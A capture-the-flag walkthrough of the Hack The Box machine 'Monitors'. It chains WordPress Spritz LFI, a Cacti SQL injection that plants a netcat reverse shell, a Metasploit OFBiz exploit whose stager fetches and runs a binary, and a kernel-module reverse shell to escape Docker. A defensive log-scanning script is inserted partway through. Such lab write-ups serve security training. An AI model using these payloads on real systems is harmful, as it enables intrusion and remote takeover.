Hack-The-Box-walkthrough[Monitors]

Introduction

OS: Linux
Difficulty: Hard
Points: 40
Release: 24 Apr 2021
IP: 10.10.10.238


Information gathering

First, run nmap as usual.

┌──(root💀kali)-[~/hackthebox/machine/monitors]
└─# nmap -sV -p- -v --min-rate=10000 10.10.10.238
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Let’s start with port 80.

Port 80

There is a simple HTML page saying that direct IP access is not allowed.

Let’s add monitors.htb to the /etc/hosts file.

┌──(root💀kali)-[~/hackthebox/machine/monitors]
└─# cat /etc/hosts
127.0.0.1 localhost server.fatty.htb
127.0.1.1 kali
10.10.10.238 monitors.htb


# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

Now let’s browse to monitors.htb.

WordPress is running on the server, so let’s run wpscan to enumerate users and look for vulnerable plugins.

[+] wp-with-spritz
| Location: http://monitors.htb/wp-content/plugins/wp-with-spritz/
| Latest Version: 1.0 (up to date)
| Last Updated: 2015-08-20T20:15:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 4.2.4 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://monitors.htb/wp-content/plugins/wp-with-spritz/readme.txt

Let’s search Google for an exploit for this plugin.

  • WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion
Proof of Concept

/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd
/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http(s)://domain/exec

Let’s visit this URL and check whether it is vulnerable to LFI.

http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
marcus:x:1000:1000:Marcus Haynes:/home/marcus:/bin/bash
Debian-snmp:x:112:115::/var/lib/snmp:/bin/false
mysql:x:109:114:MySQL Server,,,:/nonexistent:/bin/false

Now we know we can read local files, so let’s get wp-config.php.

http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../../var/www/wordpress/wp-config.php

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** MySQL database username */
define( 'DB_USER', 'wpadmin' );

/** MySQL database password */
define( 'DB_PASSWORD', 'BestAdministrator@2020!' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

We got a username and password, so let’s try to log in with these credentials.

We can’t log in with these credentials. Next, let’s try to read /var/log/apache2/access.log.

But we don’t have permission to read access.log directly.

After that I found another way to read access.log.

  • BugBounty — “Journey from LFI to RCE!!!”-How I was able to get the same in one of the India’s popular property buy/sell company.

After reading the article I came to know that “/proc/self/fd” provides symbolic links to the access logs and various other system-related files. So I tried reading those in search of the access logs.

I used Burp for that.

Capture the request and send it to Intruder.

  • request:
GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../../proc/self/fd/1 HTTP/1.1
Host: monitors.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Mark the payload position on the file descriptor number.

GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../../proc/self/fd/§1§ HTTP/1.1
Host: monitors.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Set the payload type to Numbers, from 1 to 15, and start the attack.

Sort the results by response length; the largest response is for payload 10.
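The same requests seen from the defender's side of that access log, as an added example that is not part of the original write-up: a parser for Apache combined-format lines that flags the Spritz url= parameter when it carries path traversal, a /proc/self probe, a sensitive file name, a PHP stream wrapper or an off-site include. The log lines are constructed samples; SITE_HOST and the indicator names are my own assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Apache "combined" log format, the CustomLog format used by the vhost on this box
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Endpoint named in the WP with Spritz advisory, and the site it legitimately serves
SPRITZ_PATH = "/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php"
SITE_HOST = "monitors.htb"  # assumption: only same-site fetches are expected

def parse_combined(line):
    """Split one combined-format line into fields; None if the line does not match."""
    m = COMBINED_RE.match(line.strip())
    return m.groupdict() if m else None

def classify_url_param(value):
    """Name the file-inclusion indicators present in a decoded url= value."""
    v = unquote(unquote(value))  # decode twice to catch %252e-style double encoding
    indicators = []
    if "../" in v or "..\\" in v:
        indicators.append("path-traversal")
    if "/proc/self/" in v:  # the file-descriptor enumeration trick used above
        indicators.append("proc-self-probe")
    if re.search(r"/etc/passwd|wp-config\.php|/var/log/", v):
        indicators.append("sensitive-file")
    target = urlsplit(v)
    if target.scheme and target.scheme not in ("http", "https"):
        indicators.append("php-wrapper")  # php://, data://, expect:// and friends
    elif target.scheme and target.hostname and target.hostname != SITE_HOST:
        indicators.append("remote-include")  # the RFI half of the advisory
    return indicators

def scan(lines):
    """Return (client ip, decoded url value, indicators) for suspicious Spritz requests."""
    hits = []
    for line in lines:
        rec = parse_combined(line)
        if rec is None:
            continue
        parts = urlsplit(rec["target"])
        if parts.path != SPRITZ_PATH:
            continue
        for value in parse_qs(parts.query).get("url", []):
            indicators = classify_url_param(value)
            if indicators:
                hits.append((rec["ip"], unquote(value), indicators))
    return hits

# Constructed sample log lines (not taken from the box) covering the cases discussed
def _req(ip, query):
    return f'{ip} - - [01/May/2021:04:10:11 -0400] "GET {SPRITZ_PATH}?{query} HTTP/1.1" 200 512 "-" "Mozilla/5.0"'

SAMPLE_LOG = [
    _req("10.10.14.3", "url=/../../../..//etc/passwd"),
    _req("10.10.14.3", "url=/../../../../proc/self/fd/10"),
    _req("10.10.14.3", "url=http%3A%2F%2Fexample.invalid%2Fx"),
    _req("192.0.2.7", "url=https://monitors.htb/feed/"),  # legitimate same-site use
    '192.0.2.9 - - [01/May/2021:04:14:00 -0400] "GET /index.php HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```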

Now we can read the access.log file; let’s open it in the browser.

After analyzing the file we see a new vhost.

Let’s check the /etc/apache2/sites-available/000-default.conf file to confirm that.

┌──(root💀kali)-[~/hackthebox/machine/monitors]
└─# curl "http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../../etc/apache2/sites-available/000-default.conf"
# Default virtual host settings
# Add monitors.htb.conf
# Add cacti-admin.monitors.htb.conf

<VirtualHost *:80>
# The ServerName directive sets the request scheme, hostname and port that
# the server uses to identify itself. This is used when creating
# redirection URLs. In the context of virtual hosts, the ServerName
# specifies what hostname must appear in the request's Host: header to
# match this virtual host. For the default virtual host (this file) this
# value is not decisive as it is used as a last resort host regardless.
# However, you must set it for any further virtual host explicitly.
#ServerName www.example.com

ServerAdmin admin@monitors.htb
DocumentRoot /var/www/html
Redirect 403 /
ErrorDocument 403 "Sorry, direct IP access is not allowed. <br><br>If you are having issues accessing the site then contact the website administrator: admin@monitors.htb"
UseCanonicalName Off
# Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
# error, crit, alert, emerg.
# It is also possible to configure the loglevel for particular
# modules, e.g.
#LogLevel info ssl:warn

ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined

# For most configuration files from conf-available/, which are
# enabled or disabled at a global level, it is possible to
# include a line for only one particular virtual host. For example the
# following line enables the CGI configuration for this host only
# after it has been globally disabled with "a2disconf".
#Include conf-available/serve-cgi-bin.conf
</VirtualHost>

# vim: syntax=apache ts=4 sw=4 sts=4 sr noet

Found a new vhost called cacti-admin.monitors.htb.

Let’s add this to the /etc/hosts file.

Now let’s go to cacti-admin.monitors.htb.

We get a login page; let’s log in with the WordPress credentials we found in wp-config.php.

Username : admin
Password : BestAdministrator@2020!

We logged in successfully and are inside the Cacti admin panel; let’s check the Cacti version.

version : 1.2.12

Let’s search Google for an exploit for that specific version.

cacti 1.2.12 exploit poc

We find a GitHub issue.

  • SQL Injection vulnerability due to input validation failure when editing colors (CVE-2020-14295)

There is an SQL injection in the latest version (in the /cacti/color.php page, on the filter parameter).

And the application accepts stacked queries; this can easily lead to remote code execution by replacing the path_php_binary setting inside the database.

Let’s try this to get a reverse shell.

http://cacti-admin.monitors.htb/cacti/color.php?action=export&header=false&filter=1%27)+UNION+SELECT+1,username,password,4,5,6,7+from+user_auth;update+settings+set+value=%27rm+/tmp/aa%3bmkfifo+/tmp/aa%3bcat+/tmp/aa|/bin/sh+-i+2%3E%261|nc+10.10.14.3+9001+%3E/tmp/aa;%27+where+name=%27path_php_binary%27;--+-

Hitting this URL gives you a file download; ignore the file and hit the second URL.

Before hitting the second URL, start your netcat listener on port 9001.

http://cacti-admin.monitors.htb/cacti/host.php?action=reindex

The page keeps loading; let’s check the netcat listener.

Got the reverse shell as www-data.

┌──(root💀kali)-[~/hackthebox/machine/monitors]
└─# nc -lvp 9001
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.10.238.
Ncat: Connection from 10.10.10.238:52046.
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data

Now we need access as the marcus user, so I use grep to search every directory for files containing the string “marcus”.

I found an interesting file called cacti-backup.service.

It points to /home/marcus/.backup/backup.sh, and when we cat that file we find the password for marcus.

$ grep 'marcus' /etc -R 2>/dev/null
/etc/group-:marcus:x:1000:
/etc/subgid:marcus:165536:65536
/etc/group:marcus:x:1000:
/etc/passwd:marcus:x:1000:1000:Marcus Haynes:/home/marcus:/bin/bash
/etc/systemd/system/cacti-backup.service:ExecStart=/home/marcus/.backup/backup.sh
/etc/subuid:marcus:165536:65536
/etc/passwd-:marcus:x:1000:1000:Marcus Haynes:/home/marcus:/bin/bash
$ cd /etc/systemd/system/
$ cat cacti-backup.service
[Unit]
Description=Cacti Backup Service
After=network.target

[Service]
Type=oneshot
User=www-data
ExecStart=/home/marcus/.backup/backup.sh

[Install]
WantedBy=multi-user.target
$ cat /home/marcus/.backup/backup.sh
#!/bin/bash

backup_name="cacti_backup"
config_pass="VerticalEdge2020"

zip /tmp/${backup_name}.zip /usr/share/cacti/cacti/*
sshpass -p "${config_pass}" scp /tmp/${backup_name} 192.168.1.14:/opt/backup_collection/${backup_name}.zip
rm /tmp/${backup_name}.zip

Let’s log in as marcus over SSH and get the user.txt file.

marcus@monitors:~$ id
uid=1000(marcus) gid=1000(marcus) groups=1000(marcus)
marcus@monitors:~$ whoami
marcus
marcus@monitors:~$ cat user.txt
1e3139a8fb55977c78625b57f5c97c4e

Privilege escalation

Let’s check the services running on the server.

marcus@monitors:~$ netstat -ant
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:8443 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN
tcp 0 36 10.10.10.238:22 10.10.14.3:59860 ESTABLISHED
tcp 0 0 10.10.10.238:52046 10.10.14.3:9001 CLOSE_WAIT
tcp6 0 0 :::22 :::* LISTEN
tcp6 0 0 :::80 :::* LISTEN
tcp6 1 0 10.10.10.238:80 10.10.14.3:34042 CLOSE_WAIT

We find an interesting port, 8443. Let’s check on Google what this service is.

It’s an HTTPS port. Let’s forward it over SSH, because it listens only on localhost and we can’t access it directly.

ssh -L 8443:127.0.0.1:8443 marcus@10.10.10.238

Now let’s check in the browser what service is running there.

It’s running Apache Tomcat/9.0.31. Let’s search Google for an exploit.

  • Apache OFBiz XML-RPC Java Deserialization

Now let’s run the msfconsole and configure that.

msf6 > use exploit/linux/http/apache_ofbiz_deserialization
[*] Using configured payload linux/x64/meterpreter_reverse_https
msf6 exploit(linux/http/apache_ofbiz_deserialization) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf6 exploit(linux/http/apache_ofbiz_deserialization) > set lhost 10.10.14.3
lhost => 10.10.14.3
msf6 exploit(linux/http/apache_ofbiz_deserialization) > set lport 9001
lport => 9001
msf6 exploit(linux/http/apache_ofbiz_deserialization) > set forceexploit true
forceexploit => true
msf6 exploit(linux/http/apache_ofbiz_deserialization) > set payload linux/x64/shell/reverse_tcp
payload => linux/x64/shell/reverse_tcp
msf6 exploit(linux/http/apache_ofbiz_deserialization) > run
msf6 exploit(linux/http/apache_ofbiz_deserialization) > run

[*] Started reverse TCP handler on 10.10.14.3:9001
[*] Executing automatic check (disable AutoCheck to override)
[!] The target is not exploitable. Target cannot deserialize arbitrary data. ForceExploit is enabled, proceeding with exploitation.
[*] Executing Linux Dropper for linux/x64/shell/reverse_tcp
[*] Using URL: http://0.0.0.0:8088/xFKYmWzlLi853C
[*] Local IP: http://192.168.177.128:8088/xFKYmWzlLi853C
[+] Successfully executed command: curl -so /tmp/uTbDdZRj http://10.10.14.3:8088/xFKYmWzlLi853C;chmod +x /tmp/uTbDdZRj;/tmp/uTbDdZRj;rm -f /tmp/uTbDdZRj
[*] Command Stager progress - 100.00% done (117/117 bytes)
[*] Client 10.10.10.238 (curl/7.64.0) requested /xFKYmWzlLi853C
[*] Sending payload to 10.10.10.238 (curl/7.64.0)
[*] Sending stage (38 bytes) to 10.10.10.238
[*] Command shell session 1 opened (10.10.14.3:9001 -> 10.10.10.238:60830) at 2021-05-01 04:58:09 -0400
[*] Server stopped.

id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
pwd
/usr/src/apache-ofbiz-17.12.01

We are root, but inside a Docker container.

Now let’s run linpeas.

Let’s search Google for abusing container capabilities.

  • Docker Container Breakout: Abusing SYS_MODULE capability!

Let’s check the capabilities granted to the Docker container.

root@531ea6f91c39:/usr/src/apache-ofbiz-17.12.01# capsh --print
capsh --print
Current: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+eip
Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
Securebits: 00/0x0/1'b0
secure-noroot: no (unlocked)
secure-no-suid-fixup: no (unlocked)
secure-keep-caps: no (unlocked)
uid=0(root)
gid=0(root)
groups=

Let’s check the IP of the docker0 interface from the marcus SSH shell.

marcus@monitors:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b9:67:57 brd ff:ff:ff:ff:ff:ff
inet 10.10.10.238/24 brd 10.10.10.255 scope global ens160
valid_lft forever preferred_lft forever
inet6 dead:beef::250:56ff:feb9:6757/64 scope global dynamic mngtmpaddr
valid_lft 86280sec preferred_lft 14280sec
inet6 fe80::250:56ff:feb9:6757/64 scope link
valid_lft forever preferred_lft forever
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:27:57:47:01 brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
inet6 fe80::42:27ff:fe57:4701/64 scope link
valid_lft forever preferred_lft forever
4: br-968a1c1855aa: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
link/ether 02:42:6c:c5:00:44 brd ff:ff:ff:ff:ff:ff
inet 172.18.0.1/16 brd 172.18.255.255 scope global br-968a1c1855aa
valid_lft forever preferred_lft forever
6: veth8849a36@if5: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default
link/ether ee:80:6e:96:12:95 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet6 fe80::ec80:6eff:fe96:1295/64 scope link
valid_lft forever preferred_lft forever

Now we need to create two files:

1 -> reverse-shell.c

#include <linux/kmod.h>
#include <linux/module.h>

MODULE_LICENSE("GPL");
MODULE_AUTHOR("AttackDefense");
MODULE_DESCRIPTION("LKM reverse shell module");
MODULE_VERSION("1.0");

char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/172.17.0.1/4443 0>&1", NULL};
static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };

static int __init reverse_shell_init(void) {
    return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}

static void __exit reverse_shell_exit(void) {
    printk(KERN_INFO "Exiting\n");
}

module_init(reverse_shell_init);
module_exit(reverse_shell_exit);

2 -> Makefile

obj-m += reverse-shell.o
all:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
clean:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean

Now, in the Docker root shell, wget the two files into the /root directory.

root@531ea6f91c39:/root# wget http://10.10.14.3:88/reverse-shell.c
wget http://10.10.14.3:88/reverse-shell.c
--2021-05-01 09:40:30-- http://10.10.14.3:88/reverse-shell.c
Connecting to 10.10.14.3:88... connected.
HTTP request sent, awaiting response... 200 OK
Length: 616 [text/plain]
Saving to: 'reverse-shell.c'

reverse-shell.c 100%[===================>] 616 --.-KB/s in 0s

2021-05-01 09:40:30 (60.4 MB/s) - 'reverse-shell.c' saved [616/616]

root@531ea6f91c39:/root# wget http://10.10.14.3:88/Makefile
wget http://10.10.14.3:88/Makefile
--2021-05-01 09:41:04-- http://10.10.14.3:88/Makefile
Connecting to 10.10.14.3:88... connected.
HTTP request sent, awaiting response... 200 OK
Length: 160 [application/octet-stream]
Saving to: 'Makefile'

Makefile 100%[===================>] 160 --.-KB/s in 0s

2021-05-01 09:41:05 (23.8 MB/s) - 'Makefile' saved [160/160]

Now export the PATH and compile the module. The build produces a lot of files, but we only need reverse-shell.ko.

root@531ea6f91c39:/root# ls
ls
Makefile reverse-shell.c
root@531ea6f91c39:/root# export PATH=$PATH/usr/lib/gcc/x86_64-linux-gnu/8/
export PATH=$PATH/usr/lib/gcc/x86_64-linux-gnu/8/
root@531ea6f91c39:/root# make clean
make clean
make -C /lib/modules/4.15.0-142-generic/build M=/root clean
make[1]: Entering directory '/usr/src/linux-headers-4.15.0-142-generic'
make[1]: Leaving directory '/usr/src/linux-headers-4.15.0-142-generic'
root@531ea6f91c39:/root# make all
make all
make -C /lib/modules/4.15.0-142-generic/build M=/root modules
make[1]: Entering directory '/usr/src/linux-headers-4.15.0-142-generic'
CC [M] /root/reverse-shell.o
Building modules, stage 2.
MODPOST 1 modules
CC /root/reverse-shell.mod.o
LD [M] /root/reverse-shell.ko
make[1]: Leaving directory '/usr/src/linux-headers-4.15.0-142-generic'
root@531ea6f91c39:/root# ls
ls
Makefile modules.order reverse-shell.ko reverse-shell.mod.o
Module.symvers reverse-shell.c reverse-shell.mod.c reverse-shell.o

Before inserting the kernel module, start your netcat listener in the marcus SSH shell.

marcus@monitors:~$ nc -lnvp 4443
Listening on [0.0.0.0] (family 0, port 4443)

Now let’s insert the kernel module using insmod.

root@531ea6f91c39:/root# insmod reverse-shell.ko
insmod reverse-shell.ko

Now let’s check our netcat listener.

marcus@monitors:~$ nc -lnvp 4443
Listening on [0.0.0.0] (family 0, port 4443)

Connection from 10.10.10.238 41538 received!
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
root@monitors:/#
root@monitors:/# id
id
uid=0(root) gid=0(root) groups=0(root)
root@monitors:/# whoami
whoami
root
root@monitors:/# cat /root/root.txt
cat /root/root.txt
a58bf869665a6b00d8d31d195d2af59b

Summary of knowledge

  • WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion
  • use /proc/self/fd from LFI to RCE
  • SQL Injection vulnerability due to input validation failure when editing colors (CVE-2020-14295)
  • Apache OFBiz XML-RPC Java Deserialization
  • privesc via Abusing SYS_MODULE capability

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security researcher, hacker, bug hunter and more…